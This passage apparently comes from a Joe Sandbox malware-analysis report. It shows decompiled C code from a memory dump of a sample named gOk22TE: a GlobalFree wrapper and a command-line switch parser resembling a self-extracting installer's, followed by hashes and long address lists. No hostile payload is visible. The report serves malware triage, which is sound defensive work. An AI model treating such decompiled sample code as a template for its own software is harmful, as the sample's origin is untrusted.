                                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                                • Opcode ID: 05ee9cdf5216ee9352b41dc3e9404c031c78feae1ec3d7569a71be86cc67eddd
                                                                                                                                                                                                                                                • Instruction ID: b2ec98124c7ca023bcd8908504b16c9d46b3bf3390fdd05d8bca199a594103ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05ee9cdf5216ee9352b41dc3e9404c031c78feae1ec3d7569a71be86cc67eddd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABB0123314420CF7CF101EC3E809F853F5DE7C8B61F150000F60C4A0408A7795108795
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E4CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                                0x010e4cc8
                                                                                                                                                                                                                                                0x010e4ccf

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                                                                                                                                • Opcode ID: 098f025b5c914edee307f7b163346ec93f764747e64aef05dec8a93621d5d681
                                                                                                                                                                                                                                                • Instruction ID: 89846b3abdaae744b0e51e7ab2470597cf8d385939833bc7a2d7408c655d6ef5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 098f025b5c914edee307f7b163346ec93f764747e64aef05dec8a93621d5d681
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EB0123100010CF78F101A43E8088453F5DD6C47707000010F50C460118B3B98118684
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 010E5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E010E5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x10e8004; // 0x71a8563c
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E010E6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E010E6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x10e8004; // 0x71a8563c
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E010E597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E010E44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x10e9124 = E010E6285();
									_t75 = 0;
								}
								return E010E6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E010E44B9(0, 0x521, 0x10e1140, 0, 0x40, 0);
												_t85 =  *0x10e8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E010E667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E010E667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E010E5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E010E1680(0x10e8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E010E667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E010E667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x10e8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E010E5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x10e8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x10e8a3a;
																}
																E010E1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E010E658A(_t218, 0x104, 0x10e1140);
																if(E010E31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x10e8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x10e8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x10e8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x10e8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x10e8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x10e9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x10e9a2c =  *0x10e9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x10e8d48 =  *0x10e8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x10e9a2c =  *0x10e9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x10e9a2c =  *0x10e9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x10e8d48 =  *0x10e8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x10e9a2c =  *0x10e9a2c | 0x00000004;
																										L70:
																										 *0x10e8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x10e9a2c = 3;
																	 *0x10e8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x10e8a2c != 0 &&  *0x10e8b3e == 0) {
						if(GetModuleFileNameA( *0x10e9a3c, 0x10e8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E010E66C8(0x10e8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                                                                0x010e5c9e
                                                                                                                                                                                                                                                0x010e5ca9
                                                                                                                                                                                                                                                0x010e5cb0
                                                                                                                                                                                                                                                0x010e5cb3
                                                                                                                                                                                                                                                0x010e5cb6
                                                                                                                                                                                                                                                0x010e5cb7
                                                                                                                                                                                                                                                0x010e5cb8
                                                                                                                                                                                                                                                0x010e5cbd
                                                                                                                                                                                                                                                0x010e6204
                                                                                                                                                                                                                                                0x010e5ccb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5ccb
                                                                                                                                                                                                                                                0x010e5cd3
                                                                                                                                                                                                                                                0x010e5cd7
                                                                                                                                                                                                                                                0x010e5cf4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5cf4
                                                                                                                                                                                                                                                0x010e5cf8
                                                                                                                                                                                                                                                0x010e5d00
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d06
                                                                                                                                                                                                                                                0x010e5d06
                                                                                                                                                                                                                                                0x010e5d0e
                                                                                                                                                                                                                                                0x010e5d10
                                                                                                                                                                                                                                                0x010e5d12
                                                                                                                                                                                                                                                0x010e5d14
                                                                                                                                                                                                                                                0x010e5d15
                                                                                                                                                                                                                                                0x010e5d17
                                                                                                                                                                                                                                                0x010e5d49
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d19
                                                                                                                                                                                                                                                0x010e5d19
                                                                                                                                                                                                                                                0x010e5d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d3f
                                                                                                                                                                                                                                                0x010e5d3f
                                                                                                                                                                                                                                                0x010e5d4b
                                                                                                                                                                                                                                                0x010e5d4b
                                                                                                                                                                                                                                                0x010e5d4f
                                                                                                                                                                                                                                                0x010e5d8d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d93
                                                                                                                                                                                                                                                0x010e5d93
                                                                                                                                                                                                                                                0x010e5d9a
                                                                                                                                                                                                                                                0x010e5d9d
                                                                                                                                                                                                                                                0x010e5d9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d9e
                                                                                                                                                                                                                                                0x010e5d51
                                                                                                                                                                                                                                                0x010e5d5b
                                                                                                                                                                                                                                                0x010e5d72
                                                                                                                                                                                                                                                0x010e60fb
                                                                                                                                                                                                                                                0x010e60fb
                                                                                                                                                                                                                                                0x010e6207
                                                                                                                                                                                                                                                0x010e620a
                                                                                                                                                                                                                                                0x010e620b
                                                                                                                                                                                                                                                0x010e620e
                                                                                                                                                                                                                                                0x010e6217
                                                                                                                                                                                                                                                0x010e5d78
                                                                                                                                                                                                                                                0x010e5d78
                                                                                                                                                                                                                                                0x010e5d80
                                                                                                                                                                                                                                                0x010e5d83
                                                                                                                                                                                                                                                0x010e5d84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d84
                                                                                                                                                                                                                                                0x010e5d5d
                                                                                                                                                                                                                                                0x010e5d5f
                                                                                                                                                                                                                                                0x010e5d62
                                                                                                                                                                                                                                                0x010e5d68
                                                                                                                                                                                                                                                0x010e5d64
                                                                                                                                                                                                                                                0x010e5d64
                                                                                                                                                                                                                                                0x010e5d64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d62
                                                                                                                                                                                                                                                0x010e5d5b
                                                                                                                                                                                                                                                0x010e5d4f
                                                                                                                                                                                                                                                0x010e5d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d9f
                                                                                                                                                                                                                                                0x010e5d9f
                                                                                                                                                                                                                                                0x010e5da5
                                                                                                                                                                                                                                                0x010e5dab
                                                                                                                                                                                                                                                0x010e5dba
                                                                                                                                                                                                                                                0x010e6218
                                                                                                                                                                                                                                                0x010e621d
                                                                                                                                                                                                                                                0x010e6220
                                                                                                                                                                                                                                                0x010e6221
                                                                                                                                                                                                                                                0x010e6229
                                                                                                                                                                                                                                                0x010e6230
                                                                                                                                                                                                                                                0x010e6247
                                                                                                                                                                                                                                                0x010e626a
                                                                                                                                                                                                                                                0x010e6272
                                                                                                                                                                                                                                                0x010e6249
                                                                                                                                                                                                                                                0x010e6255
                                                                                                                                                                                                                                                0x010e625f
                                                                                                                                                                                                                                                0x010e6264
                                                                                                                                                                                                                                                0x010e6264
                                                                                                                                                                                                                                                0x010e6284
                                                                                                                                                                                                                                                0x010e5dc0
                                                                                                                                                                                                                                                0x010e5dc0
                                                                                                                                                                                                                                                0x010e5dca
                                                                                                                                                                                                                                                0x010e5e22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5dcc
                                                                                                                                                                                                                                                0x010e5dce
                                                                                                                                                                                                                                                0x010e5e24
                                                                                                                                                                                                                                                0x010e5e24
                                                                                                                                                                                                                                                0x010e5e2c
                                                                                                                                                                                                                                                0x010e5e47
                                                                                                                                                                                                                                                0x010e5e4a
                                                                                                                                                                                                                                                0x010e61d2
                                                                                                                                                                                                                                                0x010e61e2
                                                                                                                                                                                                                                                0x010e61e7
                                                                                                                                                                                                                                                0x010e61ee
                                                                                                                                                                                                                                                0x010e61f1
                                                                                                                                                                                                                                                0x010e61f1
                                                                                                                                                                                                                                                0x010e61f8
                                                                                                                                                                                                                                                0x010e61f8
                                                                                                                                                                                                                                                0x010e5e50
                                                                                                                                                                                                                                                0x010e5e53
                                                                                                                                                                                                                                                0x010e6109
                                                                                                                                                                                                                                                0x010e611f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6125
                                                                                                                                                                                                                                                0x010e6137
                                                                                                                                                                                                                                                0x010e613a
                                                                                                                                                                                                                                                0x010e613c
                                                                                                                                                                                                                                                0x010e613e
                                                                                                                                                                                                                                                0x010e613e
                                                                                                                                                                                                                                                0x010e6141
                                                                                                                                                                                                                                                0x010e6141
                                                                                                                                                                                                                                                0x010e6143
                                                                                                                                                                                                                                                0x010e6144
                                                                                                                                                                                                                                                0x010e614a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6150
                                                                                                                                                                                                                                                0x010e6152
                                                                                                                                                                                                                                                0x010e615c
                                                                                                                                                                                                                                                0x010e6170
                                                                                                                                                                                                                                                0x010e6172
                                                                                                                                                                                                                                                0x010e617c
                                                                                                                                                                                                                                                0x010e6190
                                                                                                                                                                                                                                                0x010e6190
                                                                                                                                                                                                                                                0x010e6196
                                                                                                                                                                                                                                                0x010e61a5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e61ab
                                                                                                                                                                                                                                                0x010e61b9
                                                                                                                                                                                                                                                0x010e61c6
                                                                                                                                                                                                                                                0x010e61c6
                                                                                                                                                                                                                                                0x010e617e
                                                                                                                                                                                                                                                0x010e6180
                                                                                                                                                                                                                                                0x010e618a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e618a
                                                                                                                                                                                                                                                0x010e615e
                                                                                                                                                                                                                                                0x010e6160
                                                                                                                                                                                                                                                0x010e616a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e616a
                                                                                                                                                                                                                                                0x010e615c
                                                                                                                                                                                                                                                0x010e614a
                                                                                                                                                                                                                                                0x010e610b
                                                                                                                                                                                                                                                0x010e610e
                                                                                                                                                                                                                                                0x010e610e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e59
                                                                                                                                                                                                                                                0x010e5e59
                                                                                                                                                                                                                                                0x010e5e5c
                                                                                                                                                                                                                                                0x010e604f
                                                                                                                                                                                                                                                0x010e6056
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e605c
                                                                                                                                                                                                                                                0x010e606e
                                                                                                                                                                                                                                                0x010e6071
                                                                                                                                                                                                                                                0x010e6073
                                                                                                                                                                                                                                                0x010e6075
                                                                                                                                                                                                                                                0x010e6075
                                                                                                                                                                                                                                                0x010e6078
                                                                                                                                                                                                                                                0x010e6078
                                                                                                                                                                                                                                                0x010e607a
                                                                                                                                                                                                                                                0x010e607b
                                                                                                                                                                                                                                                0x010e6081
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6087
                                                                                                                                                                                                                                                0x010e6087
                                                                                                                                                                                                                                                0x010e608d
                                                                                                                                                                                                                                                0x010e609c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e60a2
                                                                                                                                                                                                                                                0x010e60aa
                                                                                                                                                                                                                                                0x010e60b2
                                                                                                                                                                                                                                                0x010e60b7
                                                                                                                                                                                                                                                0x010e60bd
                                                                                                                                                                                                                                                0x010e60bf
                                                                                                                                                                                                                                                0x010e60bf
                                                                                                                                                                                                                                                0x010e60d6
                                                                                                                                                                                                                                                0x010e60e0
                                                                                                                                                                                                                                                0x010e60e7
                                                                                                                                                                                                                                                0x010e60f5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e60f5
                                                                                                                                                                                                                                                0x010e609c
                                                                                                                                                                                                                                                0x010e6081
                                                                                                                                                                                                                                                0x010e5e62
                                                                                                                                                                                                                                                0x010e5e62
                                                                                                                                                                                                                                                0x010e5e65
                                                                                                                                                                                                                                                0x010e5fd3
                                                                                                                                                                                                                                                0x010e5fe9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5fef
                                                                                                                                                                                                                                                0x010e5fef
                                                                                                                                                                                                                                                0x010e5ff7
                                                                                                                                                                                                                                                0x010e5ffd
                                                                                                                                                                                                                                                0x010e6003
                                                                                                                                                                                                                                                0x010e6006
                                                                                                                                                                                                                                                0x010e6011
                                                                                                                                                                                                                                                0x010e6014
                                                                                                                                                                                                                                                0x010e603d
                                                                                                                                                                                                                                                0x010e6016
                                                                                                                                                                                                                                                0x010e6018
                                                                                                                                                                                                                                                0x010e6019
                                                                                                                                                                                                                                                0x010e601b
                                                                                                                                                                                                                                                0x010e6033
                                                                                                                                                                                                                                                0x010e601d
                                                                                                                                                                                                                                                0x010e6020
                                                                                                                                                                                                                                                0x010e6029
                                                                                                                                                                                                                                                0x010e6022
                                                                                                                                                                                                                                                0x010e6022
                                                                                                                                                                                                                                                0x010e6022
                                                                                                                                                                                                                                                0x010e6020
                                                                                                                                                                                                                                                0x010e601b
                                                                                                                                                                                                                                                0x010e6042
                                                                                                                                                                                                                                                0x010e6044
                                                                                                                                                                                                                                                0x010e6046
                                                                                                                                                                                                                                                0x010e604a
                                                                                                                                                                                                                                                0x010e5ff7
                                                                                                                                                                                                                                                0x010e5fd5
                                                                                                                                                                                                                                                0x010e5fd8
                                                                                                                                                                                                                                                0x010e5fd8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e6b
                                                                                                                                                                                                                                                0x010e5e6b
                                                                                                                                                                                                                                                0x010e5e6e
                                                                                                                                                                                                                                                0x010e5f8b
                                                                                                                                                                                                                                                0x010e5f99
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5f9f
                                                                                                                                                                                                                                                0x010e5fa7
                                                                                                                                                                                                                                                0x010e5faf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5fb1
                                                                                                                                                                                                                                                0x010e5fb3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5fb5
                                                                                                                                                                                                                                                0x010e5fb7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5fb9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5fb9
                                                                                                                                                                                                                                                0x010e5fb7
                                                                                                                                                                                                                                                0x010e5fb3
                                                                                                                                                                                                                                                0x010e5faf
                                                                                                                                                                                                                                                0x010e5f8d
                                                                                                                                                                                                                                                0x010e5f8d
                                                                                                                                                                                                                                                0x010e5f8d
                                                                                                                                                                                                                                                0x010e5f8f
                                                                                                                                                                                                                                                0x010e5fc1
                                                                                                                                                                                                                                                0x010e5fc1
                                                                                                                                                                                                                                                0x010e5fc1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e74
                                                                                                                                                                                                                                                0x010e5e74
                                                                                                                                                                                                                                                0x010e5e77
                                                                                                                                                                                                                                                0x010e5ea0
                                                                                                                                                                                                                                                0x010e5ebd
                                                                                                                                                                                                                                                0x010e5f79
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5f7f
                                                                                                                                                                                                                                                0x010e5ec3
                                                                                                                                                                                                                                                0x010e5ec3
                                                                                                                                                                                                                                                0x010e5ecc
                                                                                                                                                                                                                                                0x010e5ed4
                                                                                                                                                                                                                                                0x010e5ed6
                                                                                                                                                                                                                                                0x010e5edc
                                                                                                                                                                                                                                                0x010e5edf
                                                                                                                                                                                                                                                0x010e5eea
                                                                                                                                                                                                                                                0x010e5eed
                                                                                                                                                                                                                                                0x010e5f3f
                                                                                                                                                                                                                                                0x010e5f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5eef
                                                                                                                                                                                                                                                0x010e5eef
                                                                                                                                                                                                                                                0x010e5ef2
                                                                                                                                                                                                                                                0x010e5f34
                                                                                                                                                                                                                                                0x010e5ef4
                                                                                                                                                                                                                                                0x010e5ef4
                                                                                                                                                                                                                                                0x010e5ef7
                                                                                                                                                                                                                                                0x010e5f2b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5ef9
                                                                                                                                                                                                                                                0x010e5ef9
                                                                                                                                                                                                                                                0x010e5efc
                                                                                                                                                                                                                                                0x010e5f22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5efe
                                                                                                                                                                                                                                                0x010e5eff
                                                                                                                                                                                                                                                0x010e5f02
                                                                                                                                                                                                                                                0x010e5f16
                                                                                                                                                                                                                                                0x010e5f04
                                                                                                                                                                                                                                                0x010e5f07
                                                                                                                                                                                                                                                0x010e5f0d
                                                                                                                                                                                                                                                0x010e5f46
                                                                                                                                                                                                                                                0x010e5f46
                                                                                                                                                                                                                                                0x010e5f09
                                                                                                                                                                                                                                                0x010e5f09
                                                                                                                                                                                                                                                0x010e5f09
                                                                                                                                                                                                                                                0x010e5f07
                                                                                                                                                                                                                                                0x010e5f02
                                                                                                                                                                                                                                                0x010e5efc
                                                                                                                                                                                                                                                0x010e5ef7
                                                                                                                                                                                                                                                0x010e5ef2
                                                                                                                                                                                                                                                0x010e5f4c
                                                                                                                                                                                                                                                0x010e5f4e
                                                                                                                                                                                                                                                0x010e5f50
                                                                                                                                                                                                                                                0x010e5f54
                                                                                                                                                                                                                                                0x010e5ed4
                                                                                                                                                                                                                                                0x010e5ea2
                                                                                                                                                                                                                                                0x010e5ea4
                                                                                                                                                                                                                                                0x010e5eaf
                                                                                                                                                                                                                                                0x010e5eaf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e79
                                                                                                                                                                                                                                                0x010e5e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e83
                                                                                                                                                                                                                                                0x010e5e83
                                                                                                                                                                                                                                                0x010e5e83
                                                                                                                                                                                                                                                0x010e5e85
                                                                                                                                                                                                                                                0x010e5e85
                                                                                                                                                                                                                                                0x010e5e8e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e94
                                                                                                                                                                                                                                                0x010e5e8e
                                                                                                                                                                                                                                                0x010e5e7d
